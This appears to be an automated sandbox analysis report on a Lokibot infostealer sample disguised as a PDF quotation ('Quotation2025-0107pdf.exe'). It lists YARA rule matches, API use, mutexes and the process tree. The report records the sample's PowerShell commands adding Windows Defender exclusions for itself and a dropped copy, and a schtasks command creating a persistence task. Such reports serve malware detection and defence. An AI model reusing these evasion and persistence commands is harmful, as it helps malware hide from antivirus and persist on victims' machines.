Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Quotation2025-0107pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mexnJkivovwH.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/17@0/1

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Code function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

13_2_0040434D

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2404.tmp

Jump to behavior

Source: Quotation2025-0107pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quotation2025-0107pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File read: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
